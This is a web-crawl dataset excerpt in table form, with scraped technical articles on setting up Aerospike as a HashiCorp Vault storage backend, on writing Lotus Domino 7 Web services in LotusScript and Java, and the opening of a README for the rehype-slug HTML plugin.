text
stringlengths 454
608k
| url
stringlengths 17
896
| dump
stringclasses 91
values | source
stringclasses 1
value | word_count
int64 101
114k
| flesch_reading_ease
float64 50
104
|
|---|---|---|---|---|---|
Vault 1.7.0 is released, and it includes my contribution to support the Aerospike database as backend storage. See the release notes for more details.
From now on, Aerospike users can store their sensitive data using Vault almost seamlessly.
I will not talk about the benefits of using Vault and will jump into the installation and configuration details right away.
Setup
First thing you’ll need is to install Vault if you haven’t done this yet.
Make sure that the Vault binary is available on the PATH. See this page for instructions on setting the PATH on Linux and Mac. This page contains instructions for setting the PATH on Windows.
Verify the installation worked by opening a new terminal session and checking that the vault binary is available.
$ vault version Vault v1.7.0 (4e222b85c40a810b74400ee3c54449479e32bb9f)
Configuration
Outside of development mode, Vault servers are configured using a file. The format of this file is HCL. Let’s configure our Aerospike cluster to be the Vault’s backend storage:
storage "aerospike" { hostname = "localhost" port = "3300" namespace = "test" set = "vault" } listener "tcp" { address = "127.0.0.1:8200" tls_disable = 1 }
You can find more information about the Aerospike backend configuration here.
To start the server:
vault server -config aerospike_backend.hcl
The Vault server is up and running on the default 8200 port.
Now open a new terminal window and go through the guide to initialize the Vault server.
It is a little bit cumbersome with all those unseals and login, but you’ll figure it out.
After the successful login, we need to enable a version 1 kv store:
vault secrets enable -version=1 kv
Usage
Now is the time to try things out.
$ vault kv put kv/my-secret my-value=s3cr3t Success! Data written to: kv/my-secret $ vault kv get kv/my-secret ====== Data ====== Key Value --- ----- my-value s3cr3t
Your first secret was successfully stored and retrieved from Aerospike using Vault!
In this short introduction blog post, we covered the setup of Vault using Aerospike as a storage backend.
The Aerospike backend supports both CE and EE and doesn’t expose all the configuration properties available. We will work to include those in future releases.
I hope you are excited about this new Vault capability. Please let us know if you encounter any issues using it.
Discussion (0)
|
https://practicaldev-herokuapp-com.global.ssl.fastly.net/aerospike/aerospike-as-a-backend-storage-for-hashicorp-vault-3inf
|
CC-MAIN-2021-21
|
refinedweb
| 390
| 65.73
|
[Editor's note: This article describes the Lotus Notes/Domino 7 Beta 2 implementation of Web services. It may not accurately reflect the features or functionality of the Gold version of Lotus Notes/Domino 7.].
Lotus Domino maps the WSDL interface to an agent-like Web service design element that can be coded in LotusScript or Java. To be used, the Web service must be on a Domino server with HTTP enabled. (We can test the Web service through an HTTP session in the Notes client preview.) Access is through one of the following Domino URL commands:
- ?OpenWebService invokes the Web service in response to a SOAP-encoded message sent through an HTTP POST. An HTTP GET (for example, a browser query) returns the name of the service and its operations.
- ?WSDL returns the WSDL document in response to an HTTP GET.
This article describes the Web services design element in Lotus Notes/Domino 7 and provides LotusScript and Java examples of the design element. This article assumes that you are an experienced Notes application developer with knowledge of LotusScript or Java.
Let's take a simple example. Given a database name, a view name, and a document number, our operation returns the content of a Subject item. We'll call our operation getNthSubject.
Figure 1. getNthSubject diagram
To make the operation available to the outside world, we publish it in a Web service called GetSubject. GetSubject can contain any number of operations. For example, we might find getFirstSubject and getLastSubject useful. But for now let's just deal with our example operation, getNthSubject. Here's an excerpt from a WSDL document describing a Web service that contains such an operation. Look at it in conjunction with the annotations that follow.
Look first at the portType element (1), which defines a set of operations for the service. Our service has just one portType, which has just one operation, getNthSubject (2). The operation has two "messages" (3): one for input and one for output. The messages are defined in message elements (4). We see that the input message has three parts (5): two strings named dbname and viewname and an int named n. The output message has a single part (6) named getNthSubjectReturn which is a string.
So we have one operation with three input parts and one output part, which maps very neatly to a procedure with three read-only parameters and one return value. In LotusScript, such a procedure would be defined by the following function:
Public Function getNthSubject(dbname As String, viewname As String, n As Long) As String
And in Java by the following method:
public String getNthSubject(String dbname, String viewname, int n)
Web service design element
Several approaches are possible for creating a Web service design element in Domino Designer. We can code it entirely in LotusScript or Java. In these cases, saving the design element generates a WSDL document that reflects the LotusScript or Java code. Or we can import an existing WSDL document. In this case, LotusScript or Java is generated that reflects the operations in the imported WSDL. The Web service design element saves the WSDL document as well as the code. If the public interface has not changed, the WSDL document stays as is. If, in our coding, we change anything that affects the public interface, a new WSDL is generated.
In Domino Designer, the Web service design element resides below Agents under Shared code. The Web service design window looks a lot like the agent design window. Click the New Web Service button to create a new Web service. Double-click an existing Web service to edit it.
Figure 2. New Web Service
The Web Services Property box has three tabs just like agents. Here's the Basics tab:
Figure 3. Web Services Property box
A name is required. An alias and comment can be supplied or not. You can elect to be warned if a coding change causes generation of a new WSDL.
The PortType class is the name of the class that defines the procedures that map to the WSDL operations. These procedures must be public functions or subs in LotusScript and public methods in Java. Private functions, subs, and methods are not exposed through the Web services interface. We cannot enter the PortType class in the properties box until we have created the class through coding or importing a WSDL. We will look more closely at the code shortly.
The Security tab is almost exactly the same as the agent Security tab. We will discuss Security in more detail later.
The Advanced tab has additional information for defining the Web service and generating the WSDL. We will discuss this in more detail later.
The editor pane is similar to an agent's. In the right drop-down box, we can select LotusScript or Java. Below a selection of Java is shown. On the left are Objects and Reference panes.
Figure 4. Web service (Java)
Use the Import WSDL button to create a new Web service based on an existing WSDL document. The Show WSDL button compiles any changes to the Web service and displays the WSDL document that defines its public interface. The Export WSDL button compiles any changes to the Web service and exports the WSDL document that defines its public interface. We can also compile by saving or closing the Web service. The WSDL is regenerated only if the public interface changes.
The code for a Web service has the following elements:
- A class definition for the implementation code. This class must become the PortType class named in the Basics tab of the properties box and must be public.
- Within the class, a procedure (function, sub, or method) definition for each operation in the Web service. These procedures must be public. Supporting procedures that we don't want in the interface must be private.
- Inclusion of lsxsd.lss for LotusScript and import of lotus.domino.types.* for Java.
- Initialization of a NotesSession (LotusScript) or Session (Java) object if Domino Objects are accessed. This is best done in a new block for LotusScript or a no-parameter constructor for Java. For Java, we used WebServiceBase.getCurrentSession() to get a Session object. We may also want to get an AgentContext object with Session.getAgentContext(). WebServiceBase is the equivalent of JavaAgent, but the Web service does not have access to the object. The only useful method is the static getCurrentSession().
Here is a template for LotusScript code where the Web service contains one operation. The operation is the example described above with three input parameters and one return value.
And here is a template for Java code where the Web service contains one operation. The constructor must be the default constructor (have no parameters). Other constructors are ignored.
Now we'll expand the examples to include the working code. Here's the LotusScript:
Here's the Java:
Invoking and testing Web services
Ultimately, the Web service design element must reside on a Domino 7 server with HTTP running. We can test a Web service design element residing on Domino Designer. We must first select Design - Preview in Web Browser on anything (a form, for example) which starts HTTP. Use 127.0.0.1 for the computer address if the consumer is on the same machine as the Notes client. To act as a consumer of a Web service, we have to send a SOAP message in an HTTP POST request to the URL for the Domino Web service. The URL looks something like this:
The SOAP message looks something like this:
In this example, the SOAP message (1) identifies the operation and (2) provides values for the input parts. The specific elements appearing in the SOAP-ENV:body are determined by the WSDL binding characteristics, especially the SOAP message format (see "Advanced Properties" below for more detail).
The WebSphere SDK for Web Services provides a tool for invoking Web services and viewing results. This SDK runs under Eclipse. The following must be installed:
The WebSpere SDK (as of this writing) does not work with Eclipse 3.0. You can also use WebSphere Studio Application Developer to invoke Web services. The latest version is v5.1.2.
To use the WebSphere SDK tool, open Eclipse and choose Run - Launch the Web Services Explorer. After the Web Services Explorer loads:
- Click the WSDL Page icon. This is the third icon after the right arrow on the right top. A WSDL Main link appears in the Navigator pane on the left.
- Click the WSDL Main link. An Open WSDL box appears in the right pane.
- Enter the URL of the Web service with the command ?WSDL, for example,, and click Go. We want ?WSDL (not ?OpenWebService) because Web Services Explorer reads the WSDL document at this point.
- A WSDL Binding Details box appears in the right pane. It contains links to the operations defined by the Web service.
- Click the name of the operation, for example, getNthSubject. An Invoke a WSDL Operation box appears.
- Enter values for the input parts (parameters) and click Go.
The response comes back in the bottom (Status) pane.Here's what Web Services Explorer might look like after invoking the example Web service.
Figure 5. Web Services Explorer
The Actions box has a Source link in the upper right. Clicking Source shows the actual SOAP message. We can modify the SOAP message, and then transmit it by clicking Go. Click Form in the upper right to go back to the original display. The Status box also has a Source link which allows us to see the SOAP response. If the status says there is nothing to display (and a response is expected), the code probably failed.
After running a Web service, check the server console or log.nsf for error messages. We can log or debug by inserting MessageBox statements, which print to the server console or log.nsf. (Do not use Print statements in Beta 2. They go to the HTTP stream as for an agent and corrupt the SOAP response.)
The Advanced tab of the properties box affects the Web service definition as reflected in the WSDL document.
Figure 6. Advanced tab of the Web Services Property box
We can provide what names we want for port type, service element, and service port. For example, we could use GetSubject for all the names. For clarity, we use suffixes that reflect the element type. When we provide names in the properties box, these names are plugged into the generated WSDL document. If we import a WSDL document, the names in the WSDL document are automatically plugged into the properties box.
Below is the complete WSDL document for the GetSubject example. Annotated are the portions reflected in the Advanced tab of the Web Services Property box.
(1) The port type defines a set of operations. The WSDL document contains a name attribute for wsdl:portType which corresponds to the Port type name advanced property. (2) The service identifies the supported ports. The WSDL document contains a name attribute for wsdl:service which corresponds to the Service element name advanced property. The location attribute of wsdlsoap:address is not correct if the WSDL was obtained through Export WSDL, Show WSDL, or preview in a browser in Domino Designer; it is correct if obtained from the server through the ?WSDL URL command. (3) A port identifies a binding which in turn identifies a port type and provides additional information. The WSDL document contains a name attribute for wsdl:port under wsdl:service. Domino allows one service and one port per service. (4) Two programming models and four SOAP message formats are available. The RPC programming model allows four SOAP message formats: RPC/encoded, RPC/literal, Doc/literal, and Wrapped (the utility of Doc/encoded, the fifth possible format, is not well understood, so is not supported here). The Message programming model forces Doc/literal message format, but as a hint only; the actual SOAP message format that gets passed in a Message-based Web service is not published, but rather is by private contract between consumer and provider. The style attribute of wsdlsoap:binding is set as follows:
- wsdlsoap:binding style="rpc" for RPC/encoded and RPC/literal
- wsdlsoap:binding style="document" for Doc/literal and Wrapped
(5) In the input and output elements under wsdl:binding, the use attribute of wsdlsoap:body is set as follows:
- wsdlsoap:body use="encoded" for RPC/encoded. In this case, an encodingStyle attribute is present.
- wsdlsoap:body use="literal" for RPC/literal, Doc/literal, and Wrapped. In these cases, there is no encodingStyle attribute.
(6) For RPC/encoded and RPC/literal, each message part defines the data type by a direct reference to the XMLSchema namespace (for example, type="xsd:string" or type="xsd:int") or a complex type defined in the WSDL "types" section (not shown in this example).
For Doc/literal, each message part refers to a previously defined data element. Below is an excerpt from the sample WSDL with Doc/literal specified. Under wsdl:types, each input part is defined in an element named after the corresponding parameter in the procedure code, and the output part is defined in an element named after the procedure plus "Return."
For Wrapped, each message has one part which refers to a previously defined element of type complexType named for the operation using it and having no attributes. Below is the WSDL excerpt with Wrapped specified.
For an excellent discussion of the SOAP formats, see the developerWorks article, "Which style of WSDL should I use?" by Russell Butek.
(7) soapAction="" if "Include operation name in SOAP action" remains unchecked. If this option is checked, the soapAction specifies the name of the operation, for example:
<wsdlsoap:operation
Web services security is similar to security for a server agent invoked from the Web. Below is an example of the Security tab in the Web Services Property box.
Figure 7. Security tab in Web Services Property box
The first two lines determine who is running the Web service, that is, the effective user: If neither line is used, the effective user is the owner of the Web service (the last user who edited or signed the design element).
- If the "Run as Web user" option is selected, the effective user is the user who negotiates network access to the database containing the Web service: Anonymous if the database allows anonymous access or the name supplied to the authentication process.
- If the "Run on behalf of" field is filled in, the effective user is that user.
The consumer of the Web service must be able to negotiate access to the server. Access is automatic if anonymous access is allowed on the HTTP port. Otherwise, the consumer must authenticate with a valid name and Internet password. The database ACL must give the effective user at least Depositor access with Read public documents checked.
"Compile Java code with debugging information" allows connection to a running Web service from a Java debugger such as Eclipse that supports the JPDA (Java Platform Debugger Architecture). Java debugging is new in release 7 and works only on a Notes client. For debugging, then, the Web service must reside on a Notes client. Start an HTTP task on the client by choosing Design - Preview in Web Browser on anything. Invoke the Web service. The Web service should contain debug-only code to pause it for awhile. Then connect the debugger to the running Web service.
For LotusScript Web services, "Allow remote debugging" takes the place of the Java debugging line. Remote debugging for a Web service is the same as for an agent. In this case, the Web service must reside on a server.
"Profile this Web service" allows the collection of elapsed times taken by Domino Objects. To report the results on a selected Web service, choose Design - View Profile Results. Profiling is new in release 7 and works for agents coded in LotusScript and Java as well as Web services.
The "Set runtime security level" box allows three levels of security. The higher-numbered security levels allow potentially damaging operations such as writing to the file system, manipulating environment variables, and so on.
For "Default access to this Web service," we can allow all readers and above, or we can enumerate those who have access.
Web services use the same framework as agents. In the back end, most but not all of agent context applies to Web services. We have already seen how to obtain Session and AgentContext objects in Java and a NotesSession object in LotusScript. Here are the other main contextual elements associated with Web services.
Web service design elements can be locked and unlocked the same as agents.
Here is a LotusScript example that demonstrates getting properties associated with the Web service context. The Web service has three operations.
Below is the Java code.
Operations that use the following model do not require complex data types:
- A single scalar output value (or no output value)
- Scalar input values (or no input values)
Operations returning more than one scalar output value or taking more than scalar input values require complex data types. The use of complex data types allows the movement of large and varied data structures.
The following sections discuss complex data types:
- Arrays
- Classes
- Inout and output parameters
Arrays
Arrays map to a complexType WSDL element named ArrayOf suffixed by the data type. The WSDL defines the complexType element as an array.
For example, the following operation, implemented as a Java method, returns a String array.
The Java String array maps to a WSDL complexType element named ArrayOf_xsd_string which is defined as an array of type string. The message that defines the return value for the getAll operation (getAllResponse) has one part whose type is ArrayOf_xsd_string.
In LotusScript, we cannot return an array to a Web service consumer. The language rules require that an array return value be defined as a Variant which does not provide enough information to interpret the type when the WSDL is generated. The work-around is to put the array in a class as shown below.
Classes
Classes map to a complexType WSDL element named after the class. Here's a Java example that provides the same data as the Arrays example, but instead of returning an array, we return an object.
The Java class InfoClass maps to a complexType of the same name. The complexType has three elements, each of type xsd:string, named after the public data elements in the Java InfoClass class.
Here is the LotusScript equivalent.
Inout and output parameters
Where an output message has one part, whether it be a simple or complex type, the output maps to the return value of a function or method. If an output message has more than one part, the output maps to parameters as well as or instead of a return value. The exact mapping depends on the input parts and how they combine with the output parts. If the first output part does not match any input part and the remaining output parts match the input parts, then the first output part maps to a function or method return value and the remaining parts map to inout parameters.
Otherwise, matching input and output parts map to inout parameters, non-matching input parts map to input parameters, and non-matching output parts map to output parameters. In this case, there is no return value and for LotusScript, subs are used instead of functions.
This WSDL excerpt is a variation of our first example that sends back the input values in the response:
(1) One output part does not match an input part -- getNthSubjectReturn. This part maps to a function or method return value. (2)(3)(4) The three remaining output parts -- dbname, viewname, and n -- are the same as the three input parts. These parts map to three inout parameters.
Inout and output parameters cannot be primitive data types. Standard Java provides a package javax.xml.rpc.holders with methods for holding inout and output parameters of various types. Lotus Domino maps inout and output parameters to these classes, which are shown below:
These classes have a public variable named "value" that the application code can get and set. The following example is a variation of getNthSubject that returns a String as before, but makes the three parameters inout through the use of StringHolder and IntHolder classes. The values of the parameters are passed back to the consumer in the SOAP response.
For LotusScript, the include file lsxsd.lss defines the following holder classes for inout and output parameters.
These classes have a public variable named "Value" that the application code can get and set. The following LotusScript example is the same as the preceding in Java. The holder classes are used for the three inout parameters.
The primitive data types and their XSD counterparts generally map back and forth. The exception is that an imported SOAPENC data type maps to an object. However, the object maps to an XSD data type on output to a generated WSDL.
(1) Java uses the wrapper classes defined in java.lang: java.lang.Boolean, java.lang.Byte, and so on. LotusScript uses the XSD_ classes defined in lsxsd.lss: XSD_BOOLEAN, XSD_BYTE, and so on. The LotusScript classes inherit the following methods:
Function GetValueAsString() As String
Sub SetValueAsString(value As String)
Note: In an upcoming Beta release, the name SetValueAsString will change to SetValueFromString.
Here is a Java example of an operation returning a java.lang.Boolean type:
The corresponding operation in LotusScript returns an XSD_BOOLEAN type:
(2) LotusScript does not use a primitive for xsd:byte. It always maps to XSD_BYTE (the LotusScript primitive maps to xsd:unsignedByte). (3) LotusScript does not use a primitive for xsd:long. It always maps to XSD_LONG (the LotusScript primitive maps to xsd:int). (4) Java has no primitive for xsd:string. It always maps to java.lang.String.
Other XSD data types map to java.lang, java.math, java.util, and lotus.domino.types (new with Lotus Notes/Domino 7) objects in Java, and XSD_ objects in LotusScript.
(1) A Variant maps to xsd:anyType on output to a generated WSDL. (2) soapenc:base64 maps to byte[] and Byte when imported from a WSDL. A generated WSDL always maps to xsd:base64Binary. (3) soapenc:decimal and soapenc:integer map to XSD:DECIMAL and XSD:INTEGER when imported from a WSDL. A generated WSDL always maps to xsd:decimal and xsd:integer. (4) xsd:unsignedByte maps to Byte when imported from a WSDL. Byte and XSD_UNSIGNEDBYTE both map to xsd:unsignedByte in a generated WSDL.
Domino Web services expose public functions, subs, and methods in the implementation class. Private procedures are hidden. Here is a revision of the GetSubject example that uses public procedures to expose the operations getFirstSubject, getLastSubject, and getNthSubject. Common code is provided through the private procedures openDatabase, openView, and getSubject.
Here is the example in Java.
Lotus Notes/Domino 7 supports the provider side of Web services through agent-like design elements coded in Java or LotusScript. The Web service must reside on a Domino 7 server with HTTP enabled, except that a Web service can be tested and debugged through a Web preview on a Notes client. Consumers access Domino Web services through SOAP-encoded HTTP POST requests.
Web service operations map to public Java methods and public LotusScript functions and subs. Web service data parts map to parameters and return values. Where possible, XSD data types map to Java and LotusScript primitives. Otherwise, complexType elements map to objects.
This article is based on the Beta 2 release of Lotus Notes/Domino 7. Enhancements may be made as development progresses. For example, a future release is expected to support placement of Web service code in script libraries.
- Lotus Domino supports SOAP 1.1 and WSDL 1.1. For specifications and background information, see the following W3C documents:
- Simple Object Access Protocol (SOAP) 1.1
- Web Services Description Language (WSDL) 1.1
- Web Services Architecture
- Web Services Activity
- For more information about SOAP formats, read the developerWorks article, "Which style of WSDL should I use?" by Russell Butek.
- Get involved in the developerWorks community by participating in developerWorks blogs.
Robert Perron is a documentation architect with Lotus in Westford, Massachusetts. He has developed documentation for Lotus Notes and Domino since the early 1990's with a primary concentration on programmability. He developed the documentation for the LotusScript and Java Notes classes and coauthored the book 60 Minute Guide to LotusScript 3 - Programming for Notes 4. He has authored several LDD Today articles. He also authored "A Comprehensive Tour of Programming Enhancements in Notes/Domino 6" for The View.
|
http://www.ibm.com/developerworks/lotus/library/nd7-webservices/
|
crawl-002
|
refinedweb
| 4,125
| 56.76
|
I'm trying to compile a python project into an executable. To test this, I've got Py2Exe installed, and am trying to do their Hello.py test. Here is hello.py:
print "Hello World!"
Here is my setup.py:
from distutils.core import setup import py2exe setup(console=['hello.py'])
I do the following on the command line:
python setup.py py2exe
And I get it mostly working until it start 'finding dlls needed', at which point we get:
Traceback: <some trace> ImportError: DLL load failed: %1 is not a valid Win32 application.
Python version is 2.6.6, and I'm on a 32-bit machine running Windows 7. Any ideas or help most appreciated.
In my experience
py2exe is rather difficult to use, a bit hit-and-miss in terms of whether it will work or not, and an absolute nightmare to get working at all with any
matplotlib import.
I realise this question is quite old now, but I am not sure why people continue to use
py2exe when there are much smoother functioning alternatives available. I have have good results with
pyinstaller (which was recommended to me after asking a question here on SO where I was also battling with
py2exe). Now every time I have tried it it "just worked", so if you're still interested in packing up python code into executables then try give this app a shot instead.
Note:
py2exe hasn't been updated for some years, while python and 3rd party modules have, which must be partly why it often doesn't work particularly well these days.
|
https://www.codesd.com/item/python-and-py2exe-1-is-not-a-valid-win32-application.html
|
CC-MAIN-2021-04
|
refinedweb
| 267
| 73.58
|
Programmatically Setting Multirow Tabs on the NetBeans Platform
By Geertjan-Oracle on Aug 07, 2013
The question of the day comes from the development team working on CAVER, which is a tool for the analysis and visualization of tunnels and channels in protein structures.
I would like to keep the tabs and get rid of the "Scroll Documents Left", "Scroll Documents Right" and the "Show Opened Documents list" buttons. Is there a way to do that?
The question is asked today right at the end of the comments on "Farewell to Space Consuming Weird Tabs". The assumption one would have is to solve the problem above one would be forced to implement or extend a TabDisplayer or TabDisplayerUI class.
However, as luck would have it, a year or two ago Toni Epple and Stan Aubrecht created and integrated into the NetBeans sources an alternative NetBeans Window System implementation based on the standard Java Swing tab classes. Their implementation allows for the support of multirow tabs, which was a frequently requested feature in NetBeans IDE. An interesting "feature" of this implementation is that it does not have any of the "Scroll Documents Left", "Scroll Documents Right" and the "Show Opened Documents list" buttons.
Below, you see the standard NetBeans Window System, with the buttons that the CAVER team don't want clearly visible, i.e., the 4 buttons to the right of the two tabs:
Now, here is the same application, minus the buttons that we'd like to have removed:
The question is how to get to the above state at startup of the application. Though the user can go to the Options window and specify that multirow tabs should be supported, we'd rather have that set at startup automatically, so that the buttons we don't want are immediately absent.
The solution to this is very simple, but has one down side. Here's all you need to do, i.e., either use the @OnStart annotation or a ModuleInstall class (the latter must be registered in the manifest, which is one reason why @OnStart is nicer):
import org.netbeans.core.windows.options.WinSysPrefs; import org.openide.modules.OnStart; @OnStart public class Installer implements Runnable { @Override public void run() { WinSysPrefs.HANDLER.putBoolean(WinSysPrefs.DOCUMENT_TABS_MULTIROW, true); WinSysPrefs.HANDLER.put(WinSysPrefs.DOCUMENT_TABS_PLACEMENT, "3"); } }
The second statement above is only needed if you'd like to have the tabs at the bottom of the main window, at startup, rather than where they are by default, at the top.
The only downside to this solution is the import statement "org.netbeans.core.windows.options.WinSysPrefs". That import statement assumes you have an implementation dependency on the "Core - Windows" module. Ideally, the above settings would be publicly available, rather than private within the module. Since these settings are quite new, it's probably safe that they're internal for the moment, but making them public would avoid the implementation dependency, the only downside to this cool solution.
Agree/disagree with the need for these settings to be public? Vote and share your thought/s here:
Hope it helps, CAVER team!
|
https://blogs.oracle.com/geertjan/entry/programmatically_setting_multirow_tabs
|
CC-MAIN-2015-40
|
refinedweb
| 516
| 51.07
|
The objective of this tutorial is to explain how to configure the ESP32 to act as a discoverable Bluetooth device and then find it using a Python program. The tests of this ESP32 tutorial were performed using a DFRobot’s ESP-WROOM-32 device integrated in a ESP32 FireBeetle board.
Introduction
The objective of this tutorial is to explain how to configure the ESP32 to act as a discoverable Bluetooth device and then find it using a Python program.
The ESP32 will be running the Arduino core. On Python, we will be using Pybluez, a module that will allow us to use the Bluetooth functionalities of a computer that supports this protocol.
Note that the use of Pybluez was already covered in this previous tutorial. As mentioned there, you can get the .exe file from the module’s page and install it.
Since the Bluetooth functionalities have just recently arrived to the Arduino core at the time of writing, you may need to get the latest version from the Github page to be able to follow this tutorial.
On the ESP32 side, we will use some lower level IDF functions to start the Bluetooth stacks and to make the device discoverable. This was already covered in detail on this previous tutorial. You can check here the Bluetooth classic API from IDF.
The tests of this ESP32 tutorial were performed using a DFRobot’s ESP-WROOM-32 device integrated in a ESP32 FireBeetle board.
The Python code
We start our Python script by importing the new library we have just installed. Note that even tough the library is called Pybluez, the actual code module we are going to use is called bluetooth.
import bluetooth
To start the discovery, we simply need to call the discover_devices function. In order for the discovery to return the names of the devices, we pass the value True in the lookup_names parameter of the function. Note that this is an optional parameter that defaults to False and without setting it to True we would only get the address of the devices.
Take in consideration that the execution of this function takes a while, in order to scan the nearby devices. By default, the discovery duration is 8 seconds, and we will not change it.
devices = bluetooth.discover_devices(lookup_names=True)
This function call will return a list that we can iterate in a for in loop, in order to print each device’s information. Each element of the list will contain both the Bluetooth address and the device name. Before this loop, we will also print the size of the list, which will correspond to the number of Bluetooth devices found during the discovery procedure.
print("Devices found: %s" % len(devices)) for item in devices: print(item)
The final code can be seen below.
import bluetooth devices = bluetooth.discover_devices(lookup_names=True) print("Devices found: %s" % len(devices)) for item in devices: print(item)
The Arduino code
We will start our code by including the libraries needed to start the Bluetooth stacks (esp_bt_main.h) and to make the device discoverable (esp_gap_bt_api.h).
Since one of the parameters that will be printed by the Python script is the address of the device, we will also print it in the ESP32 side, for comparison.
For a detailed tutorial on how to print the Bluetooth address of the ESP32, please check this previous post. For that functionality, we will need the esp_bt_device.h library.
#include "esp_bt_main.h" #include "esp_gap_bt_api.h" #include "esp_bt_device.h"
Now that we have all the needed libraries included, we need a function to initialize both the controller and host stacks of Bluetooth. This was also covered in greater detail in this previous tutorial.
This function will receive as input a string with the name of the device, which will be seen by other Bluetooth enabled devices when discovering it. Thus, this name should be later obtained in the Python program.
bool initBluetooth(const char *deviceName) { // Initialization code }
In the implementation of the function, we will first call the btStart function, to initialize the Bluetooth controller stack. Them we will call the esp_bluedroid_init and esp_bluedroid_enable functions to both init and enable Bluedroid (the host stack).
We will also perform an error checking on the call of each of the previously mentioned functions, so we are sure everything has initialized correctly.
if (!btStart()) { Serial.println("Failed to initialize controller"); return false; } if (esp_bluedroid_init()!= ESP_OK) { Serial.println("Failed to initialize bluedroid"); return false; } if (esp_bluedroid_enable()!= ESP_OK) { Serial.println("Failed to enable bluedroid"); return false; }
After the initialization, we will set the device name. To do it, we need to call the esp_bt_dev_set_device_name function. This function will receive as input a string with the name of the device. We will use the name which is the argument of our initBluetooth function.
esp_bt_dev_set_device_name(deviceName);
Then we need to make the device discoverable with a call to the esp_bt_gap_set_scan_mode function, passing as input the ESP_BT_SCAN_MODE_CONNECTABLE_DISCOVERABLE enumerated value.
esp_bt_gap_set_scan_mode(ESP_BT_SCAN_MODE_CONNECTABLE_DISCOVERABLE);
With this, we finish our initBluetooth function. Now we still need to declare and implement a function that will be used to retrieve the Bluetooth address of the ESP32.
We will basically reuse the same function of the already mentioned previous post to get the address. In its implementation, we first call the esp_bt_dev_get_address function to get the six bytes that compose the unique address. Then we will print them in the standard format, which corresponds to printing each byte in hexadecimal, separated by colons.
void printDeviceAddress() { const uint8_t* point = esp_bt_dev_get_address(); for (int i = 0; i < 6; i++) { char str[3]; sprintf(str, "%02X", (int)point[i]); Serial.print(str); if (i < 5){ Serial.print(":"); } } }
Moving on to the Arduino setup function, we will start by opening a wired serial connection, to print the results of our program. Note that the Serial object is being used by both our previously declared functions, so we need to make sure it is initialized before using it.
Serial.begin(115200);
Next we call the initBluetooth function, passing as input the name to assign to the ESP32. I’m using “ESP32 BT”, but you can use other name.
initBluetooth("ESP32 BT");
To finalize the setup function, we call the printDeviceAddress function, which will output the Bluetooth address of the ESP32. We will later be able to compare against the one obtained in the Python script.
printDeviceAddress();
The final Arduino source code for the ESP32 can be seen below.
#include "esp_bt_main.h" #include "esp_bt_device.h" #include "esp_gap_bt_api("ESP32 BT"); printDeviceAddress(); } void loop() {}
Testing the code
The first step for testing the code is to compile it and upload it to the ESP32 using the Arduino IDE. If you run into compilation problems, then you may be using an older version of the Arduino core without support for Bluetooth, which you can easily update by following this guide.
When the procedure finishes, simply open the Arduino IDE serial monitor. You should get an output similar to figure 1, which shows the device address getting printed.
Figure 1 – Bluetooth address of the ESP32.
After this, simply run the Python script we have developed on the environment of your choice. I’m running it on IDLE, the Python IDE that comes with the language installation.
You should get an output similar to figure 1, which shows the ESP32 getting detected during the scan. Note that the address matches the one we obtained on the Arduino IDE serial monitor and the device name is the same we specified in the Arduino code.
Figure 2 – Finding the device with Pybluez.
Related posts
- ESP32 Arduino Serial over Bluetooth: Receiving data
-
3 Replies to “ESP32 Arduino Bluetooth: Finding the device with Python”
|
https://techtutorialsx.com/2018/03/26/esp32-arduino-bluetooth-finding-the-device-with-python/
|
CC-MAIN-2019-04
|
refinedweb
| 1,276
| 54.22
|
Red Hat Bugzilla – Bug 664558
RFE: Allow to set log callback in Ruby bindings
Last modified: 2011-03-28 05:06:37 EDT
Currently there is no way to set a log callback using Ruby bindings. It would be very helpful for Ruby tools that want to integrate with libguestfs to catch the log output.
I think this would be useful.
As discussed on IRC, won't get done until mid Jan (by me)
but if you want to have a go at a patch then be my guest.
More thoughts on this issue:
Currently g->log_message_cb will only see messages sent by
the daemon to the VM console. If g->verbose is set, then
these messages are *also* printed to stderr (as well as being
sent to the g->log_message_cb handler if any).
Some types of message that g->log_message_cb would never see:
* extra debug from the library when g->verbose is set
* trace messages (LIBGUESTFS_TRACE=1: these go to stderr)
* debug from other things that use the guestfs_get_verbose
call, eg. capitests, guestfish
So g->log_message_cb is not very useful. At the same time
there is obviously a need to be able to capture debug and
trace messages separately in GUI programs
(guestfs-browser, BoxGrinder and RHEV-M all need it).
We cannot change g->log_message_cb, because of the ABI contract.
I will think about some alternate way and post about it on the
mailing list.
(In reply to comment #2)
> I will think about some alternate way and post about it on the
> mailing list.
Interim patch posted for review here:
Full patch series including Ruby bindings posted:
One aspect that is broken is that the Ruby interpreter segfaults
if the callback raises any sort of exception. Apparently one
can prevent this using the 'rb_rescue' function, but I have yet
to find a coherent explanation of how exactly to use this.
Hey Rich,
While the rb_* calls can be a bit dense, in the end they are relatively easy to use. rb_rescue in particular takes exactly 4 arguments: the function that you want to call, the (single) argument to that function, the function to call if the original function throws an exception, and the (single) argument to the rescue function. If you compile and run the below example, the first call to rb_rescue() calls cb, which succeeds without doing much, so only "Hello from cb" is printed. The second call to rb_rescue() calls cb, which then raises an exception, at which point rescue() is called to do cleanup work. You can compile the program with: gcc -g -Wall test.c -I/usr/lib64/ruby/1.8/x86_64-linux -lruby
#include <stdio.h>
#include <stdlib.h>
#include <ruby.h>
static VALUE cb(VALUE args)
{
fprintf(stderr, "Hello from cb\n");
if (TYPE(args) != T_FIXNUM)
rb_raise(rb_eTypeError, "expected a number");
return Qnil;
}
static VALUE rescue(VALUE args, VALUE exception_object)
{
fprintf(stderr, "Rescue args %s, object classname %s\n",
StringValueCStr(args),
rb_obj_classname(exception_object));
return Qnil;
}
int main()
{
int r;
ruby_init();
r = rb_rescue(cb, INT2NUM(0), rescue, rb_str_new2("data"));
r = rb_rescue(cb, rb_str_new2("bad"), rescue, rb_str_new2("data"));
return 0;
}
Upstream (with broken exception handling):;a=commitdiff;h=6a64114929a0b098f5a1e31e17e7802127925007
Thanks Chris; Ruby exceptions are fixed now too:;a=commitdiff;h=e751293e10d5ecbb2ef43a61b9c153a1fc4f0304
|
https://bugzilla.redhat.com/show_bug.cgi?id=664558
|
CC-MAIN-2016-36
|
refinedweb
| 538
| 59.33
|
rehype-slug
rehype plugin to add
ids to headings.
Contents
- What is this?
- When should I use this?
- Install
- Use
- API
- Types
- Compatibility
- Security
- Related
- Contribute
- License
What is this?
This package is a unified (rehype) plugin to add
ids to headings. It looks for headings (so
<h1> through
<h6>) that do not yet have
ids and adds
id attributes to them based on the text they contain. The algorithm that does this is
github-slugger, which matches how GitHub works.
unified is a project that transforms content with abstract syntax trees (ASTs). rehype adds support for HTML to unified. hast is the HTML AST that rehype uses. This is a rehype plugin that adds
